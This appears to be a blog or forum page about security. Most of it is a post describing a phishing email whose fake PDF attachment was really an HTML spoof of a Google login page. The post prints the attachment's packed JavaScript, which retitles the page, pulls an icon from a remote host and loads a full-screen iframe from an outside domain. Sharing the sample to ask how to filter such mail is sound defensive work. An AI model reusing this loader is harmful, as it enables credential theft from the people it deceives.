Collaborate Disseminate
I’m doing a project on the Apple Pay bug which has been in the news lately.
Apple Pay Bug
I want to program a simulation in Java, which would simulate the entire bug using software alone.
The EMV standards have three ‘layers’ for a transac… Continue reading Simulating Contactless Apple Pay Transport Payments in Java
Our office received an email over Christmas. There was what appeared to be a PDF file attached.
When we examined the file it was actually a Html file for a spoof google login page.
It also had a large amount of encoded <Script>
The decoded script is:
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘3.2.b=”8\’a g r l”;k{(j(){m 1=3.2.n(\’1\’);1.p=\’o/x-4\’;1.i=\’9 4\’;1.h=\’6://c.f/d/q/D/H.G\’;2.s(\’F\’)[0].I(1)}())}J(e){}3.2.K.L=”<5 E=\”6://w.v/u/t.y\” z=\”C: 0;B: 7%;A:7%\”>”;’,48,48,’|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML’.split(‘|’),0,{}
Interestingly the URL in the HTML file was to the correct google login page
I thought that emails with scripts would be flagged automatically, akin to sending an .exe or .bat file
Are there any additional precautions we can take to ensure that messages such as this are flagged or moved to spam in future without user intervention?